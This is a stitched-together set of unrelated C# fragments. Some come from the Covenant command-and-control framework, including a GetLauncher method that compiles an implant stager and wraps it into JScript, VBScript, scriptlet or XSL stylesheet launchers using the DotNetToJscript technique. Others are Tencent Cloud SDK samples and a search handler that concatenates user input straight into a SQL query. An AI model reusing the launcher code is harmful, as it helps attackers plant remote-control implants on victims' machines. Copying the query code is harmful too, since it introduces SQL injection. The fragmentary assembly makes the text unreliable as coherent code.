httpListener.ProfileId = profile.Id; } await this.CovenantClient.ApiListenersHttpPutAsync(httpListener); menuItem.Refresh(); } else { menuItem.PrintInvalidOptionError(UserInput); } } catch (HttpOperationException e) { EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content); } }
public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile, ImplantTemplate template) { this.StagerCode = listener.GetGruntStagerCode(grunt, profile, template); this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, template, this.OutputKind, false); // Credit DotNetToJscript (tyranid - James Forshaw) byte[] serializedDelegate = Convert.FromBase64String(FrontBinaryFormattedDelegate).Concat(Convert.FromBase64String(this.Base64ILByteString)).Concat(Convert.FromBase64String(EndBinaryFormattedDelegate)).ToArray(); int ofs = serializedDelegate.Length % 3; if (ofs != 0) { int length = serializedDelegate.Length + (3 - ofs); Array.Resize(ref serializedDelegate, length); } string base64Delegate = Convert.ToBase64String(serializedDelegate); int lineLength = 80; List <String> splitString = new List <String>(); for (int i = 0; i < base64Delegate.Length; i += lineLength) { splitString.Add(base64Delegate.Substring(i, Math.Min(lineLength, base64Delegate.Length - i))); } string language = ""; string code = ""; if (this.ScriptLanguage == ScriptingLanguage.JScript) { string DelegateBlock = String.Join("\"+\r\n\"", splitString.ToArray()); code = JScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock); language = "JScript"; } else if (this.ScriptLanguage == ScriptingLanguage.VBScript) { string DelegateBlock = String.Join("\"\r\ns = s & \"", splitString.ToArray()); code = VBScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock); if (this.ScriptType == ScriptletType.Stylesheet) { code = "<![CDATA[\r\n" + code + "\r\n]]>"; } language = "VBScript"; } if (this.ScriptType == ScriptletType.Plain) { this.DiskCode = code; } else if (this.ScriptType == ScriptletType.Scriptlet || this.ScriptType == ScriptletType.TaggedScript) { string TaggedScript = TaggedScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language); TaggedScript = TaggedScript.Replace("{{REPLACE_SCRIPT}}", code); if (this.ScriptType == ScriptletType.TaggedScript) { this.DiskCode = TaggedScript; } else { this.DiskCode = ScriptletCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_TAGGED_SCRIPT}}", TaggedScript).Replace("{{REPLACE_PROGID}}", this.ProgId); } } else if (this.ScriptType == ScriptletType.Stylesheet) { this.DiskCode = StylesheetCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language); this.DiskCode = DiskCode.Replace("{{REPLACE_SCRIPT}}", code); } if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net35) { this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", ""); } else if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net40) { this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", JScriptNet40VersionSetter); } return(GetLauncher(this.DiskCode)); }
static void Main1(string[] args) { try { // 必要步骤: // 实例化一个认证对象,入参需要传入腾讯云账户密钥对secretId,secretKey。 // 这里采用的是从环境变量读取的方式,需要在环境变量中先设置这两个值。 // 你也可以直接在代码中写死密钥对,但是小心不要将代码复制、上传或者分享给他人, // 以免泄露密钥对危及你的财产安全。 Credential cred = new Credential { SecretId = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_ID"), SecretKey = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_KEY") }; // 实例化一个client选项,可选的,没有特殊需求可以跳过 ClientProfile clientProfile = new ClientProfile(); // 指定签名算法(默认为HmacSHA256) clientProfile.SignMethod = ClientProfile.SIGN_SHA1; // 非必要步骤 // 实例化一个客户端配置对象,可以指定超时时间等配置 HttpProfile httpProfile = new HttpProfile(); // SDK默认使用POST方法。 // 如果你一定要使用GET方法,可以在这里设置。GET方法无法处理一些较大的请求。 httpProfile.ReqMethod = "POST"; // SDK有默认的超时时间,非必要请不要进行调整。 // 如有需要请在代码中查阅以获取最新的默认值。 httpProfile.Timeout = 10; // 请求连接超时时间,单位为秒(默认60秒) // SDK会自动指定域名。通常是不需要特地指定域名的,但是如果你访问的是金融区的服务, // 则必须手动指定域名,例如云服务器的上海金融区域名: httpProfile.Endpoint = (""); // 代理服务器,当你的环境下有代理服务器时设定 httpProfile.WebProxy = Environment.GetEnvironmentVariable("HTTPS_PROXY"); clientProfile.HttpProfile = httpProfile; // 实例化要请求产品(以cvm为例)的client对象 // 第二个参数是地域信息,可以直接填写字符串ap-guangzhou,或者引用预设的常量,clientProfile是可选的 AaiClient client = new AaiClient(cred, "ap-guangzhou", clientProfile); // 实例化一个请求对象,根据调用的接口和实际情况,可以进一步设置请求参数 // 你可以直接查询SDK源码确定DescribeInstancesRequest有哪些属性可以设置, // 属性可能是基本类型,也可能引用了另一个数据结构。 // 推荐使用IDE进行开发,可以方便的跳转查阅各个接口和数据结构的文档说明。 SentenceRecognitionRequest req = new SentenceRecognitionRequest(); string path = Directory.GetCurrentDirectory() + Path.DirectorySeparatorChar + "test.mp3"; FileStream fs = new FileStream(path, FileMode.Open); byte[] raw = new byte[fs.Length]; fs.Read(raw, 0, raw.Length); string base64data = Convert.ToBase64String(raw); fs.Close(); // 基本类型的设置。 req.ProjectId = 0; req.SubServiceType = 2; req.EngSerViceType = "16k"; req.SourceType = 1; req.VoiceFormat = "mp3"; req.UsrAudioKey = "5c79510a12da-whatever"; req.Data = base64data; req.DataLen = base64data.Length; // 数组类型的设置。 // 复杂对象的设置。 //// 这里还支持以标准json格式的string来赋值请求参数的方式。下面的代码跟上面的参数赋值是等效的 //string strParams = "{\"Filters\":[{\"Name\":\"zone\",\"Values\":[\"ap-guangzhou-1\",\"ap-guangzhou-2\"]}]}"; //req = DescribeInstancesRequest.FromJsonString<DescribeInstancesRequest>(strParams); // 通过client对象调用DescribeInstances方法发起请求。注意请求方法名与请求对象是对应的 // 返回的resp是一个DescribeInstancesResponse类的实例,与请求对象对应 SentenceRecognitionResponse resp = client.SentenceRecognitionSync(req); // 输出json格式的字符串回包 Console.WriteLine(AbstractModel.ToJsonString(resp)); } catch (Exception e) { Console.WriteLine(e.ToString()); } Console.Read(); }
public virtual string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile, ImplantTemplate template) { return(""); }
public ActionResult <HttpProfile> CreateHttpProfile([FromBody] HttpProfile profile) { _context.Profiles.Add(profile); _context.SaveChanges(); return(CreatedAtRoute(nameof(GetHttpProfile), new { id = profile.Id }, profile)); }
static void Main1(string[] args) { try { /* 必要步骤: * 实例化一个认证对象,入参需要传入腾讯云账户密钥对secretId,secretKey。 * 这里采用的是从环境变量读取的方式,需要在环境变量中先设置这两个值。 * 你也可以直接在代码中写死密钥对,但是小心不要将代码复制、上传或者分享给他人, * 以免泄露密钥对危及你的财产安全。 * CAM密匙查询:*/ Credential cred = new Credential { SecretId = "xxx", SecretKey = "xxx" }; /* * Credential cred = new Credential { * SecretId = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_ID"), * SecretKey = Environment.GetEnvironmentVariable("TENCENTCLOUD_SECRET_KEY") * };*/ /* 非必要步骤: * 实例化一个客户端配置对象,可以指定超时时间等配置 */ ClientProfile clientProfile = new ClientProfile(); /* SDK默认用TC3-HMAC-SHA256进行签名 * 非必要请不要修改这个字段 */ clientProfile.SignMethod = ClientProfile.SIGN_TC3SHA256; /* 非必要步骤 * 实例化一个客户端配置对象,可以指定超时时间等配置 */ HttpProfile httpProfile = new HttpProfile(); /* SDK默认使用POST方法。 * 如果你一定要使用GET方法,可以在这里设置。GET方法无法处理一些较大的请求 */ httpProfile.ReqMethod = "GET"; /* SDK有默认的超时时间,非必要请不要进行调整 * 如有需要请在代码中查阅以获取最新的默认值 */ httpProfile.Timeout = 10; // 请求连接超时时间,单位为秒(默认60秒) /* SDK会自动指定域名。通常是不需要特地指定域名的,但是如果你访问的是金融区的服务 * 则必须手动指定域名,例如sms的上海金融区域名: */ httpProfile.Endpoint = ""; // 代理服务器,当你的环境下有代理服务器时设定 httpProfile.WebProxy = Environment.GetEnvironmentVariable("HTTPS_PROXY"); clientProfile.HttpProfile = httpProfile; /* 实例化要请求产品(以sms为例)的client对象 * 第二个参数是地域信息,可以直接填写字符串ap-guangzhou,或者引用预设的常量 */ SmsClient client = new SmsClient(cred, "ap-guangzhou", clientProfile); /* 实例化一个请求对象,根据调用的接口和实际情况,可以进一步设置请求参数 * 你可以直接查询SDK源码确定SendSmsRequest有哪些属性可以设置 * 属性可能是基本类型,也可能引用了另一个数据结构 * 推荐使用IDE进行开发,可以方便的跳转查阅各个接口和数据结构的文档说明 */ SendSmsRequest req = new SendSmsRequest(); /* 基本类型的设置: * SDK采用的是指针风格指定参数,即使对于基本类型你也需要用指针来对参数赋值。 * SDK提供对基本类型的指针引用封装函数 * 帮助链接: * 短信控制台: * sms helper: */ req.SmsSdkAppid = "1400787878"; /* 短信签名内容: 使用 UTF-8 编码,必须填写已审核通过的签名,签名信息可登录 [短信控制台] 查看 */ req.Sign = "xxx"; /* 短信码号扩展号: 默认未开通,如需开通请联系 [sms helper] */ req.ExtendCode = "x"; /* 国际/港澳台短信 senderid: 国内短信填空,默认未开通,如需开通请联系 [sms helper] */ req.SenderId = ""; /* 用户的 session 内容: 可以携带用户侧 ID 等上下文信息,server 会原样返回 */ req.SessionContext = ""; /* 下发手机号码,采用 e.164 标准,+[国家或地区码][手机号] * 示例如:+8613711112222, 其中前面有一个+号 ,86为国家码,13711112222为手机号,最多不要超过200个手机号*/ req.PhoneNumberSet = new String[] { "+8613711112222" }; /* 模板 ID: 必须填写已审核通过的模板 ID。模板ID可登录 [短信控制台] 查看 */ req.TemplateID = "449739"; /* 模板参数: 若无模板参数,则设置为空*/ req.TemplateParamSet = new String[] { "666" }; // 通过client对象调用DescribeInstances方法发起请求。注意请求方法名与请求对象是对应的 // 返回的resp是一个DescribeInstancesResponse类的实例,与请求对象对应 SendSmsResponse resp = client.SendSmsSync(req); // 输出json格式的字符串回包 Console.WriteLine(AbstractModel.ToJsonString(resp)); } catch (Exception e) { Console.WriteLine(e.ToString()); } Console.Read(); }
public Task <HttpProfile> EditHttpProfile(HttpProfile profile, CovenantUser currentUser) { return(_connection.InvokeAsync <HttpProfile>("EditHttpProfile", profile, currentUser)); }
private void search_button_Click(object sender, EventArgs e) //搜索功能 { //更改界面状态 file_slide.Visible = false; panelResult.Visible = true; map_webbrowser.Visible = false; treeView1.Nodes.Clear(); //进度显示 textBoxHint.Visible = true; textBoxHint.Text = "加载中..."; textBoxHint.Refresh(); //nlp分析器创建 ClientProfile clientProfile = new ClientProfile(); HttpProfile httpProfile = new HttpProfile(); httpProfile.Endpoint = (""); clientProfile.HttpProfile = httpProfile; NlpClient client = new NlpClient(cred, "ap-guangzhou", clientProfile); SimilarWordsRequest req; SimilarWordsResponse resp; string[] seperator = { " ", ",", ";" }; string[] keywords = bunifuMaterialTextbox1.Text.Split(seperator, 15, StringSplitOptions.RemoveEmptyEntries); string regexp = ""; for (int i = 0; i < keywords.Length; i++) { try { textBoxHint.Text = String.Format("检索第{0}个关键词,共{1}个", i + 1, keywords.Length); textBoxHint.Refresh(); req = new SimilarWordsRequest(); string strParams = "{\"Text\":\"" + keywords[i] + "\",\"WordNumber\":20}"; req = SimilarWordsRequest.FromJsonString <SimilarWordsRequest>(strParams); resp = client.SimilarWordsSync(req); if (i > 0) { regexp += "|"; } regexp += keywords[i] + "|" + string.Join("|", resp.SimilarWords); } catch (Exception error) { MessageBox.Show(error.Message, "ERROR", MessageBoxButtons.OK, MessageBoxIcon.Error); } } string query = "select poiid, title, public_grading from public_grading " + "where poiid in " + "(SELECT poiid FROM poi.pois_features where keywords regexp '" + regexp + "') order by public_grading desc"; textBoxHint.Text = "加载查询中..."; textBoxHint.Refresh(); SelectinGeneral(query); textBoxHint.Text = String.Format("查询得到{0}个地点", progressBar1.Maximum); textBoxHint.Refresh(); }